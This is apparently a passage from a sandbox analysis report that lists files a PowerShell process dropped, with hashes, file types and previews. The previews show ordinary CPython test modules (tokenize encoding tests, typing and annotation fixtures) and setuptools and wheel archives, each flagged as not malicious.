                                                                                                                                                                                                                      SHA-512:8C6FE6F837F30C2A74F02518E5AA7744763736F9698137231B6329D7647F1BF2B3474E4326F69CC622296D757307BAFF8BD80B35C7F4F1D2176044146025E1A4
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.# IMPORTANT: this file has the utf-8 BOM signature '\xef\xbb\xbf'..# at the start of it. Make sure this is preserved if any changes..# are made!....# Arbitrary encoded utf-8 text (stolen from test_doctest2.py)...x = '.....'..def y():.. """.. And again in a comment. ....... """.. pass..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):434
                                                                                                                                                                                                                      Entropy (8bit):4.927793079567334
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:icKytuw7zFu3bhlHGs4owOvSCuWLBEEypFWsdU:lR/70gs4olSCuo9ypJe
                                                                                                                                                                                                                      MD5:D32A6B30BE39AB7165B79E8FF28F8353
                                                                                                                                                                                                                      SHA1:585EC4E47AE63E4633BF59115F6664DF3DACEE63
                                                                                                                                                                                                                      SHA-256:CFF7678394E58518901EBD65C066AC988666BFAF3152A0264DB014A79F6EB609
                                                                                                                                                                                                                      SHA-512:05964C38338496FCE4AB9A9A36132273DAE997BEC64D81C23E30A91E39FF3C347846C67A03C1581DAFE87FCC4B3FF5448440858C42C2E7051130595723F33092
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..# IMPORTANT: unlike the other test_tokenize-*.txt files, this file..# does NOT have the utf-8 BOM signature '\xef\xbb\xbf' at the start..# of it. Make sure this is not added inadvertently by your editor..# if any changes are made to this file!....# Arbitrary encoded utf-8 text (stolen from test_doctest2.py)...x = '.....'..def y():.. """.. And again in a comment. ....... """.. pass..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):338
                                                                                                                                                                                                                      Entropy (8bit):5.001120191868995
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:2zaMtlAytcf/kUkCAJHH4OrJOFi/WLaF+p85LGpFcjpOpgOEsjKK3FiNv:22cKytu/khlHYTFi/WLaFhypFWsdU
                                                                                                                                                                                                                      MD5:8FA2BD60E630510363DEAEAB1995BE8B
                                                                                                                                                                                                                      SHA1:385992E04FA9AB71A4EA13F750C6CC389BEA82BC
                                                                                                                                                                                                                      SHA-256:0A8C335C24E07D747D8658C5441AA0BDC0A41C4ED7690F083AB7CBE3817EFEE8
                                                                                                                                                                                                                      SHA-512:B277E2DB9D9A1237EFF9E1B5ADD66F30AC6740C4805949B1E339B88FB64EE148FCCCCD7530278C9C7BA5B6B12DB480453182452CFE82CB9810B95D2FDAB16F26
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.# -*- coding: utf-8 -*-..# IMPORTANT: this file has the utf-8 BOM signature '\xef\xbb\xbf'..# at the start of it. Make sure this is preserved if any changes..# are made!....# Arbitrary encoded utf-8 text (stolen from test_doctest2.py)...x = '.....'..def y():.. """.. And again in a comment. ....... """.. pass..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2906
                                                                                                                                                                                                                      Entropy (8bit):5.125140740621929
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:3CfAUSJr6fe15wbmjX+uijo0jhRgUraLckD3UaKq:zQK5wbEpi4UOLckbFKq
                                                                                                                                                                                                                      MD5:52FFABE38CF008B2C5821EDC45C326F2
                                                                                                                                                                                                                      SHA1:DC6A0DAD696850EE63645DEA780778174A77D0A6
                                                                                                                                                                                                                      SHA-256:15F3EEC6D2BD365DAA8224C5BA9A6DBEF00D8EF1CE5F2D8FF60A057492EDA4E0
                                                                                                                                                                                                                      SHA-512:341E3D1D7B5E0732DD4A810CCFF25C2713521734C9008C72290B80AEECEBCDE5615D43A3A6874EC15869D9E511A1109A23855D337C5AD12E5146DEBE3533BA50
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Tests for the 'tokenize' module...# Large bits stolen from test_grammar.py.....# Comments.."#"..#'..#"..#\.. #.. # abc..'''#..#'''....x = 1 #....# Balancing continuation....a = (3, 4,.. 5, 6)..y = [3, 4,.. 5]..z = {'a':5,.. 'b':6}..x = (len(repr(y)) + 5*x - a[.. 3 ].. - x + len({.. }.. ).. )....# Backslash means line continuation:..x = 1 \..+ 1....# Backslash does not means continuation in comments :\..x = 0....# Ordinary integers..0xff != 255..0o377 != 255..2147483647 != 0o17777777777..-2147483647-1 != 0o20000000000..0o37777777777 != -1..0xffffffff != -1; 0o37777777777 != -1; -0o1234567 == 0O001234567; 0b10101 == 0B00010101....# Long integers..x = 0..x = 0..x = 0xffffffffffffffff..x = 0xffffffffffffffff..x = 0o77777777777777777..x = 0B11101010111111111..x = 123456789012345678901234567890..x = 123456789012345678901234567890....# Floating-point numbers..x = 3.14..x = 314...x = 0.314..# XXX x = 000.314..x = .314..x = 3e14..x = 3E14..x = 3e-14..x = 3e+14..x = 3.
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):207
                                                                                                                                                                                                                      Entropy (8bit):4.317528878926516
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:7vvlGtMiFIaQE30rzR7rArAeO/wRFxdvRzKTaZDvaMxRSSKBQXFbKBi9oNEOFUFS:jvlG+CQsQ7Urmw3zVDHXYBi9azeMLUSP
                                                                                                                                                                                                                      MD5:E8210ADD754B9EEF271ADF9B115D7B10
                                                                                                                                                                                                                      SHA1:B003FB4B9C849FBAE3168D4525743C22103298D2
                                                                                                                                                                                                                      SHA-256:0F99F12A7ED87BB2787C247F360EE2FEBCD6077738179A31E631881C6010D50B
                                                                                                                                                                                                                      SHA-512:BD23B06401D91AF78A88D1C9D2BA6D2626103962A19F04C5C1C5A9DB15E7AF0EFDA8556482AD6A66F210EA3CB0371EE941C3BFA63D23BCA2E7998D867B0671E0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""This package contains modules that help testing the trace.py module. Note..that the exact location of functions in these modules is important, as trace.py..takes the real line numbers into account..."""..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):152
                                                                                                                                                                                                                      Entropy (8bit):3.8402539129389353
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:HryOOFFFQ+90avzZKXAlWKmnTFmy+3NYG:LrqFFQHkzZeA3mnTFpnG
                                                                                                                                                                                                                      MD5:4BEFC036F48A725B2DA5FC0062E80A73
                                                                                                                                                                                                                      SHA1:6A9DFF2A3D2D0D0A05F4AB2CA7A818687F6B1A5E
                                                                                                                                                                                                                      SHA-256:54F28FFDB62AE3E792FAE4C3347974173E2FF2CA9F1345DE7BFFDDC12209EF79
                                                                                                                                                                                                                      SHA-512:7A40C1BF8EAD70B78988D69F3B083E2BEC2A679D0493BC4864968435F48A819EB6E20FEB96C9D335AB37FC899CA44CFC0F83C62B3806BD8CD0EECDB942DC1093
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:def func(x):.. b = x + 1.. return b + 2....def func2():.. """Test function for issue 9936 """.. return (1,.. 2,.. 3)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):889
                                                                                                                                                                                                                      Entropy (8bit):4.8095350254957685
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:wHl5+j5aAcQON3BQC7SHnh9XglgMA/phWOjMnKCdepRjPREYBPCC0wLFTP3+DVZH:wHl8jwLN3BuHDa2ZMOpRjCuxTPc8ieKP
                                                                                                                                                                                                                      MD5:AC0A4902EFCFE6DA4A115DA6CC4A3B6D
                                                                                                                                                                                                                      SHA1:DEB3ACAC421BE3CD08EFA11D20060EDDA8492BD4
                                                                                                                                                                                                                      SHA-256:0AA920B31C54CC983B988BC17F9A3973A1716EF1B456A606603FA440C36DCB17
                                                                                                                                                                                                                      SHA-512:FC10E5C44F098F111A3F9A6B0A3309B574319CBD883617BA058E456E9F84BCEB33DEE322715EEACE9606755F9D505C8CF7A6FF4ECAF045675B94D0B2359849D5
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""Used to test `get_type_hints()` on a cross-module inherited `TypedDict` class....This script uses future annotations to postpone a type that won't be available..on the module inheriting from to `Foo`. The subclass in the other module should..look something like this:.... class Bar(_typed_dict_helper.Foo, total=False):.. b: int....In addition, it uses multiple levels of Annotated to test the interaction..between the __future__ import, Annotated, and Required..."""....from __future__ import annotations....from typing import Annotated, Generic, Optional, Required, TypedDict, TypeVar......OptionalIntType = Optional[int]....class Foo(TypedDict):.. a: OptionalIntType....T = TypeVar("T")....class FooGeneric(TypedDict, Generic[T]):.. a: Optional[T]....class VeryAnnotated(TypedDict, total=False):.. a: Annotated[Annotated[Annotated[Required[int], "a"], "b"], "c"]..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1182
                                                                                                                                                                                                                      Entropy (8bit):4.811485397531734
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:NmtFsFVCFUZHjee4CD047FEvZvKwKOKAhAljt0tBft/txA4u7z6ds5Z0o+1:NmtSuUZHjee4qD7FcZvKwKB6Uqrfxta8
                                                                                                                                                                                                                      MD5:3D66E2BC5D2FD06A44010806C3C53F3C
                                                                                                                                                                                                                      SHA1:E154BFC4D9C68C187121A8A5FC13D5E91481DFE2
                                                                                                                                                                                                                      SHA-256:FB9CB013599B4C737F4367C13E4AB9928AE5DD65880D129461B8B6989B2CDE06
                                                                                                                                                                                                                      SHA-512:0AC422579C3318B9F33232E210C73B564AF45DEC87EF2A50B81528383895CF3C0E41E98541CCF221A748282E4CC0ACD33F6A358AA96942FBF9FE0DC1D05F943D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:...."""..The module for testing variable annotations...Empty lines above are for good reason (testing for correct line numbers).."""....from typing import Optional..from functools import wraps....__annotations__[1] = 2....class C:.... x = 5; y: Optional['C'] = None....from typing import Tuple..x: int = 5; y: str = x; f: Tuple[int, int]....class M(type):.... __annotations__['123'] = 123.. o: type = object....(pars): bool = True....class D(C):.. j: str = 'hi'; k: str= 'bye'....from types import new_class..h_class = new_class('H', (C,))..j_class = new_class('J')....class F():.. z: int = 5.. def __init__(self, x):.. pass....class Y(F):.. def __init__(self):.. super(F, self).__init__(123)....class Meta(type):.. def __new__(meta, name, bases, namespace):.. return super().__new__(meta, name, bases, namespace)....class S(metaclass = Meta):.. x: str = 'something'.. y: str = 'something else'....def foo(x: int = 10):.. def bar(y: List[str]):..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):555
                                                                                                                                                                                                                      Entropy (8bit):4.802433485626489
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:PN6cHSrgREYBba3+ZivnFDdM9oNeXiFbD1AxQeFeY8dsormNAHtEN0+aL:FzyrgCLc9oVbJAx1el+E8ANEw
                                                                                                                                                                                                                      MD5:10842BA0DCD778A924C8F74A16FC5C47
                                                                                                                                                                                                                      SHA1:0CFFD385DE17878D1173C2B99B95FD78BD478E39
                                                                                                                                                                                                                      SHA-256:315DCEAE2EA3D0E7631ADE63E0FFC01BD7ABAF5B0836144B2E225B85092261AF
                                                                                                                                                                                                                      SHA-512:18C0FDB2059DE5B581472DB92E9D25F7A76F60F9305A279288AA8779825AFE7379617E17318F828352C4A5A83D8668A2233B8A6038EBEE8BD9A4AFCC9513C21B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""..Some correct syntax for variable annotation here...More examples are in test_grammar and test_parser..."""....from typing import no_type_check, ClassVar....i: int = 1..j: int..x: float = i/10....def f():.. class C: ..... return C()....f().new_attr: object = object()....class C:.. def __init__(self, x: int) -> None:.. self.x = x....c = C(5)..c.new_attr: int = 10....__annotations__ = {}......@no_type_check..class NTC:.. def meth(self, param: complex) -> None:.. .......class CV:.. var: ClassVar['CV']....CV.var = CV()..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):466
                                                                                                                                                                                                                      Entropy (8bit):4.624962209629425
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:TNssfRvjHSrHxxu1AnfdqLLmS5irc1AkwYHcYa:5sspvjyrHaAf0iIAPqcF
                                                                                                                                                                                                                      MD5:12AEF11108F40668F254F7FCDA1BA7D6
                                                                                                                                                                                                                      SHA1:EB77F51E93BA9C6360059C8F5367962BAD7B4DCA
                                                                                                                                                                                                                      SHA-256:E8E95AAAB3F92E638482193779F0DEC543B1A8BE2203BE48370809E5BE441D6E
                                                                                                                                                                                                                      SHA-512:E3D50ED23F04582825D4F2B7822FDAB656E0477D0D13863A40C1539468542FFF7D177E45117B7E2265AE0E578D426E25CFD3D9167DD59E3F01851A3BEC16ED9B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""..Correct syntax for variable annotation that should fail at runtime..in a certain manner. More examples are in test_grammar and test_parser..."""....def f_bad_ann():.. __annotations__[1] = 2....class C_OK:.. def __init__(self, x: int) -> None:.. self.x: no_such_name = x # This one is OK as proposed by Guido....class D_bad_ann:.. def __init__(self, x: int) -> None:.. sfel.y: int = 0....def g_bad_ann():.. no_such_name.attr: int = 0..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):86
                                                                                                                                                                                                                      Entropy (8bit):4.5659457207557965
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SbFojbdUXQ2RSQjNvyG3H+RIOv:SbFo2g2RSS9b3u
                                                                                                                                                                                                                      MD5:7CBFB25032C9842095593139C3397F82
                                                                                                                                                                                                                      SHA1:34E973CDB06C6C676B466F4337E2B2E4CC7FB46B
                                                                                                                                                                                                                      SHA-256:F9D409614671050377E72A2EBA86D1A4CB450EBFA81DB5ED0359B92DEE021505
                                                                                                                                                                                                                      SHA-512:7E1E5FFBC480A9F48EEAA4A87C9E7EF561EF36880A9DD8FC4B19261ABB45632A6686B6558BB37044F0303555DC35B332C2F1175BEE2A2D1F6A973795CF629D11
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# This ann_module isn't for test_typing,..# it's for test_module....a:int=3..b:str=4..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):212
                                                                                                                                                                                                                      Entropy (8bit):4.705103321424055
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:Sjc2PCeZzKTRMABJFREYByovith0P2Wyf6Fb:MCeZsRjPREYButhmo2b
                                                                                                                                                                                                                      MD5:505D07DCD0BA5E313826F59F06DC8F7F
                                                                                                                                                                                                                      SHA1:272AA1FC4FAD9BEF6F9CC6BFBE813B2082689485
                                                                                                                                                                                                                      SHA-256:FBFD530CBE90DE4CBF028E856E9223D9689D213D2580903E231273D8FE8D294F
                                                                                                                                                                                                                      SHA-512:86CAD147E7D8D0F75412B1FFED913C1A460DBABAF677E0FAA3CE7E8BDF630AC7C8E19771E8BD8291B82DDC67F8571EFE94723FE290AE5258A96E72EE88F06557
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Used by test_typing to verify that Final wrapped in ForwardRef works.....from __future__ import annotations....from typing import Final....name: Final[str] = "final"....class MyClass:.. value: Final = 3000..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):145
                                                                                                                                                                                                                      Entropy (8bit):4.523379892283055
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SWFrsnkEz+2CiSABowvLJ66MRm6NKXRZiq7JREvgB4EV+yyXfJEV+RIoUy:SJnka+2Lt1RMABJFREYBJV+yyXfJs+ay
                                                                                                                                                                                                                      MD5:FA570448C64D13B8C6D89F99BE455C03
                                                                                                                                                                                                                      SHA1:B213F4E6AA269E4B6149514F3A22A6010EC84203
                                                                                                                                                                                                                      SHA-256:CDAB6365C850DC2B300A7E64B971D674E42B9CC111CAAB43EA9C2E6EE7E7CE8C
                                                                                                                                                                                                                      SHA-512:9593547C56D8489516814A2EAC12D65E79804EFAAB5C2FE099ECB049E989DAE448275FB39FBE6D3FD491F73EDF8498BB38CB63A9BA698CA11976508509CCE57D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Tests that top-level ClassVar is not allowed....from __future__ import annotations....from typing import ClassVar....wrong: ClassVar[int] = 1..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):306
                                                                                                                                                                                                                      Entropy (8bit):5.076817140974328
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SzECz6Rcu5RCAjfRMABJ03adeGJIzmeMadepS+mFIQfatGgRwgQNv:OTz6qu59fRjW3a8H+WIQStGgRjc
                                                                                                                                                                                                                      MD5:6ADBB2112FA212BE6A3B77855FCF9E31
                                                                                                                                                                                                                      SHA1:D67F98749CF9D08D7A2A0EC2B4AAE200AB5B2B73
                                                                                                                                                                                                                      SHA-256:C4C03C8FA2051EB3F8C150B953679B66EDAE0610A8EE5E70F1B2E982FBE5F173
                                                                                                                                                                                                                      SHA-512:28C4116FC5514B9470052549D3A0AD026A64D006F29DB0D4F3814CBF426BD5A6D0AEDC16B8F3125EC6F3DCE7A3FBA904D7E99019B4FC680C15F45E5DE7A21D0C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Tests class have ``__text_signature__``....from __future__ import annotations....DEFAULT_BUFFER_SIZE = 8192....class BufferedReader(object):.. """BufferedReader(raw, buffer_size=DEFAULT_BUFFER_SIZE)\n--\n\n.. Create a new buffered reader using the given readable raw IO object... """.. pass..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):187
                                                                                                                                                                                                                      Entropy (8bit):4.858241189436596
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SFjhRcq6GNjOzvgDRVYaVrFRvyeeQQ5aYWHMwDIZRD+0KhhKROWv:SFjHFyzoNVYaVXaeKUYWHMOIzO6RRv
                                                                                                                                                                                                                      MD5:D6F5AEB2E62E0302E19F6557440A37FF
                                                                                                                                                                                                                      SHA1:10642D54C58DE73285420842D68B16EED291C72E
                                                                                                                                                                                                                      SHA-256:6BEA093BDE02E09E5EE369AF57BCE2E7AA1C2DF7BB6931D79D0DB8CB5322EE8E
                                                                                                                                                                                                                      SHA-512:972CF92253344A3F610B1EC5FC81D0FD221166994EB5D2CC97A70508CE785BA92D4305606DACF0411756E203E193836A36213B2D9083E29677AA9C24DC9093D1
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Test `@no_type_check`,..# see https://bugs.python.org/issue46571....class NoTypeCheck_Outer:.. class Inner:.. x: int......def NoTypeCheck_function(arg: int) -> int:.. .....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):294
                                                                                                                                                                                                                      Entropy (8bit):4.990638141351612
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SFomCf3f2wRNuxz2H4AZREYBG2LeKqbnStjq8ii0vL8SOfSFvRKbb4JE:Nn2EOz84AZREYBGKqbnsu89In5KbbEE
                                                                                                                                                                                                                      MD5:100B126B69280D81C40195866F07880E
                                                                                                                                                                                                                      SHA1:F431976ED0AB35D03669C1A2D2B9D399C85DDF2F
                                                                                                                                                                                                                      SHA-256:95FD58DAB93A365BC7F22A70D8AAA0C7D93784AA96A24F3E525AE1256F40F543
                                                                                                                                                                                                                      SHA-512:4567ED2D78F8FC48BC93C119DCA73B21131052BF7465287C4298A29FF08788C043ED9E74706120ABA789EE81C4D20CF68D5673E57C3314AC370D712CB4FA6110
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Test ``inspect.formatannotation``..# https://github.com/python/cpython/issues/96073....from typing import Union, List....ann = Union[List[str], int]....# mock typing._type_repr behaviour..class A: .......A.__module__ = 'testModule.typing'..A.__qualname__ = 'A'....ann1 = Union[List[A], int]..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):532
                                                                                                                                                                                                                      Entropy (8bit):4.915092957034746
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:IaxJREYB9gKT/htHqwy8xMS1N3oAXROklve6/10:IarCuf/htHh2SX4GROklvP/10
                                                                                                                                                                                                                      MD5:256201AEE4D323777A54C878D4F627CA
                                                                                                                                                                                                                      SHA1:6819693FD6D8CB7A6A12CBAA956BE68A685FACD6
                                                                                                                                                                                                                      SHA-256:E0DF2C34D77F595452B90C2B3863EC393255678941DD7707FF793722FA1552E3
                                                                                                                                                                                                                      SHA-512:071BEED9214905C64DB24A5B7113690CF2F3ADE9B4D45D4C6A4A176D345DCF98136AB69C2BC3FF319AAF163FB68D5C8D33EBBDC326088F46F9889A9554D73BAE
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""Module for testing the behavior of generics across different modules."""....from typing import TypeVar, Generic, Optional, TypeAliasType....default_a: Optional['A'] = None..default_b: Optional['B'] = None....T = TypeVar('T')......class A(Generic[T]):.. some_b: 'B'......class B(Generic[T]):.. class A(Generic[T]):.. pass.... my_inner_a1: 'B.A'.. my_inner_a2: A.. my_outer_a: 'A' # unless somebody calls get_type_hints with localns=B.__dict__....type Alias = int..OldStyle = TypeAliasType("OldStyle", int)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1089263
                                                                                                                                                                                                                      Entropy (8bit):7.990499524693109
                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                      SSDEEP:24576:HsBJsJ7gQzm+uxutSwEygeL+OcOTMoO5u8VO/HsWB20:HsUJ7g4m+mfJygeLPAoOTVrWBz
                                                                                                                                                                                                                      MD5:3B5B846E000DA033D54EEAAF7915126E
                                                                                                                                                                                                                      SHA1:A650218F60EEA1F38AF46E8AF3B42135728BB897
                                                                                                                                                                                                                      SHA-256:E728CA814A823BF7BF60162DAF9DB95B93D532948C4C0BEA762CE62F60189078
                                                                                                                                                                                                                      SHA-512:AD7A81C60B2B3F190561178531123A0E2D278C4CD9615930D5B0276FC79BEA390F1CC92AB37061378EBEE09FC36C21440A4DB00F20029093570B7006CD14B25B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:PK.........m|V.}a.~...........distutils-precedence.pthE.... ...~..B.........a.4R.Am...P..p..m/.Ci..WA......I....Fm..'..Bv...i.&B>b-Y<Cggz.Leq.9(.........1$.[.....ny!..{jk...p..PK.........m|V..._............_distutils_hack/__init__.py.Xko.8..._A..,...G.p..v....:3A..~(...h..,."....>.D.....6z.>x.=.^j.rU....J..r.2.M.ek.7..'...v.J...H.T.j...8.WI2f..uq....2q*......b.^x]&..1...ZhQ.h....'.l...R.V...-._-LS..T../s.|#j-U..r...Xt9e7.^x....[.P5...YSf..../.u.O.:W.L+.n+.53+aw!.e.oeL...f..u......R.....{;K...Rq{1?..J.....v>.I/..../.........E.nV..m.5+U..gZ..W......Ap..!......"..N?.....EE.R.......Q...6mm@O.....x...*x&\|.w......=H...=..fk.e..y..(d$.Z.<.d*V|#U...%..W.V.o....v...w.@W.....\."CyO.(u...Gq...O...u...i.N.[..BA.,..2...K&...5L.T.3....Y{..}.....t..N|..!tu.....?..........+.C...3D$.......[.{l....c...S.b...|.f...Y.v.k.|.w.."...V}...%./o.xz...SQ..d.@. .L-..J....Z.k0...Z..x..e%...t...Ka........~...|y.O>|||......x...x1v.rij../;......@5...?.....q.G._.....$~...,...ia>.
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):64545
                                                                                                                                                                                                                      Entropy (8bit):7.958957200423682
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:z0LADMlwMcq2euhTVD2m9Yz+OQ5EvZx8/rCppYN:z0OtMcqBSDf9YSOQ5Evz8/r5N
                                                                                                                                                                                                                      MD5:517D39F133BD7B1FF17CAF09784B7543
                                                                                                                                                                                                                      SHA1:6AE6A9C1CC7F5D333F991B68030984484F5E718D
                                                                                                                                                                                                                      SHA-256:D236B20E7CB522DAF2390FA84C55EEA81C5C30190F90F29AE2CA1AD8355BF247
                                                                                                                                                                                                                      SHA-512:83C4511BC8186485C7E61DA1A798FDC41E209841300D70EA8E8F5515EC8200667B0195E3DF149A81F10E3EAA159E8BAB7F1701B43CE3D6746AEE79CD0BA862E7
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:PK........9ynV?.@.:...;.......wheel/__init__.pyK+..U..O+-)-J..W..-./*QH.../I,...+../K-*.....J.z&.z.J\.PK........9ynV.?n.............wheel/__main__.py]P.n. ....Vzhr(.u....v.*D.gA.;..6.?.i6.'...{.UU....B..i...B...j$}....'&89...a......W...(5.q...7....8.h...............@...0.O.(p...7s...i...o.....PU]..:........~!8nn..S+..}.o.;.27G...$v<wp~.r0..........5..L..K.....#V<...\&...z...,M:R....J.R[...b..PK........9ynVU.At|...........wheel/_setuptools_logging.py.RMo.@...+,ra..? ....V.rHZ.....1.1........mz........t<.Z.#{H(.$......p..$..x..p..t.~...4.,s....G......b.mZ.gZ.TX.Ql.lb.j...h.....u..`.........U.|.....~..8.4...F/.2.?.....l]u^...3^*I,....v..\..tiG.,5|.)A..9.G.x.|&.6.{.u..+j.,.L2..$.......7.t.....L..a...g...Q.u....'.h..5_.^#k=.w.+.V.n...^...S.k?..E].r.m...W......wmM.n=W......|...wy..,.5.....G...i........v(..PK........9ynV.Q..Z....M......wheel/bdist_wheel.py.<]w.8v...8.#r"q.8M.n...d|6.}.g.Y..HH."Y...q...{/...).....D......=.;8.y.p...5.9..u..4.M.-.&+...
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1465
                                                                                                                                                                                                                      Entropy (8bit):5.075698053067356
                                                                                                                                                                                                                      Encrypted:false
